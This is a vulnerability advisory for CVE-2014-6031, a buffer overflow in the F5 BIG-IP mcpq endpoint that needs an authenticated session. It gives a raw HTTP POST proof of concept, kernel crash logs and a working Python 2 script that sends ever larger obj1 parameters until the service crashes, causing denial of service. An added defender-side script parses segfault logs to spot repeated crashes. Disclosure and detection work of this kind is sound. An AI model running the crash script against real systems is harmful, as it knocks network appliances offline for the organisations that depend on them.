F5 BigIP MCPQ vulnerability CVE-2014-6031

F5 BigIP MCPQ vulnerability CVE-2014-6031 - Authenticated

Vulnerable Systems:

Description:

An instance was discovered where the application code behind the mcpq endpoint is vulnerable to a buffer overflow attack.
Due to limited access to the system and the SELinux/ptrace protections in place, there was not enough time to create a proper exploit for this issue.
It was possible to create a Denial of Service condition; further exploitability was not analyzed.

POC:

This was achieved by gradually sending larger strings in the obj1 parameter of the POST body:

POST /mcpq/mcpq HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F4272FF1E20F4CD2E8946D7CA0F28485; BIGIPAuthCookie=B9F3DDD8ED712164358FC4CF67C1A83F6E33F401; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5_refreshpage="https%3A//192.168.235.216/tmui/Control/jspmap/tmui/system/user/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""; f5formpage="/tmui/system/user/list.jsp?&"
Connection: keep-alive
Referer: https://x.x.x.x/tmui/dashboard/MonitorDashboardModule.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 365381

func=stat&obj1=aaaaaaa*x
On the target server the crash can be observed in the kernel logs:
mcpq[10187]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ff86be7c error 4 in libc-2.5.so[56c6b000+155000]
mcpq[10312]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffe0f97c error 4 in libc-2.5.so[56c6b000+155000]
mcpq[10587]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffe1073c error 4 in libc-2.5.so[56c6b000+155000]
mcpq[10594]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffd1b84c error 4 in libc-2.5.so[56c6b000+155000]
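As an added defender-side example (not part of the original advisory), the following Python 3 script parses kernel segfault lines in the format shown above and flags a process that keeps crashing at the same instruction offset and fault address, which is what separates a reproducible, input-triggered crash like this one from random faults. The four mcpq lines are the advisory's own; the sshd line is constructed noise, and the error-code decoding follows the x86 page-fault error bits.

```python
import re
from collections import Counter

# Sample input: the four mcpq lines are copied from the advisory's kernel
# log excerpt; the sshd line is constructed noise to show process filtering.
SAMPLE_LOG = [
    "mcpq[10187]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ff86be7c error 4 in libc-2.5.so[56c6b000+155000]",
    "mcpq[10312]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffe0f97c error 4 in libc-2.5.so[56c6b000+155000]",
    "mcpq[10587]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffe1073c error 4 in libc-2.5.so[56c6b000+155000]",
    "mcpq[10594]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffd1b84c error 4 in libc-2.5.so[56c6b000+155000]",
    "sshd[2211]: segfault at 0 ip 0000000008049abc sp 00000000ffbd0000 error 6 in sshd[8048000+40000]",
]

# Linux "segfault at" line: process, pid, fault address, ip, sp, error code,
# and the mapped object (with base and size) that the ip falls inside.
SEGFAULT_RE = re.compile(
    r"(?P<proc>[\w.-]+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+) "
    r"in (?P<obj>\S+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\]"
)

def decode_error(err):
    """x86 page-fault error code: bit0 = protection, bit1 = write, bit2 = user."""
    mode = "user-mode" if err & 4 else "kernel-mode"
    access = "write" if err & 2 else "read"
    page = "a protection violation" if err & 1 else "a non-present page"
    return "%s %s of %s" % (mode, access, page)

def parse_segfault(line):
    """Parse one kernel segfault line into a dict, or return None."""
    m = SEGFAULT_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    for k in ("addr", "ip", "sp", "base", "size"):
        d[k] = int(d[k], 16)
    d["pid"], d["err"] = int(d["pid"]), int(d["err"])
    # ip relative to the mapped object: stays the same across runs even when
    # ASLR moves the absolute addresses, so it identifies one crash site.
    d["ip_off"] = d["ip"] - d["base"]
    return d

def find_repeated_crashes(lines, proc="mcpq", threshold=3):
    """Count crashes per (object, ip offset, fault address) for `proc` and
    return the sites hit at least `threshold` times as (site, count)."""
    counts = Counter()
    for line in lines:
        rec = parse_segfault(line)
        if rec and rec["proc"] == proc:
            counts[(rec["obj"], rec["ip_off"], rec["addr"])] += 1
    return [(site, n) for site, n in counts.items() if n >= threshold]
```

Run over the advisory's excerpt, the mcpq crashes collapse to a single site in libc-2.5.so reached four times with a user-mode read of a non-present page at the same address, which is the signature to alert on.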

Python POC

import httplib

# Python 2 proof of concept: POST the stat request with an ever larger obj1.
CRASH_TEMPLATE = """func=stat&obj1=%s"""
SERVER_ADDR = "127.0.0.1"
SERVER_PORT = 443

def GenCrash(userargs):
    body = CRASH_TEMPLATE % (userargs)
    blen = len(body)
    requestor = httplib.HTTPS(SERVER_ADDR, SERVER_PORT)
    #httplib.HTTPSConnection.debuglevel = 10
    requestor.putrequest("POST", "/mcpq/mcpq")
    requestor.putheader("Host", SERVER_ADDR)
    requestor.putheader("Content-Type", 'application/x-www-form-urlencoded')
    # Authenticated issue: a valid session cookie is required.
    requestor.putheader("Cookie", "BIGIPAuthCookie=798FCD4F7E031F3E5ED83FA065862B4EB302F4B1")
    requestor.putheader("Content-Length", str(blen))
    requestor.endheaders()
    requestor.send(body)
    (status_code, message, reply_headers) = requestor.getreply()
    reply_body = requestor.getfile().read()

    print reply_body

def main():
    # Grow obj1 by 1 KB per iteration until the process crashes.
    for i in range(0, 500):
        GenCrash("A" * 1024 * int(i))

if __name__ == '__main__':
    main()

Impact:

It is possible to cause a Denial of Service condition.

Recommendation:

Please see F5’s advisory for patch details.
https://support.f5.com/kb/en-us/solutions/public/16000/100/sol16196.html

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.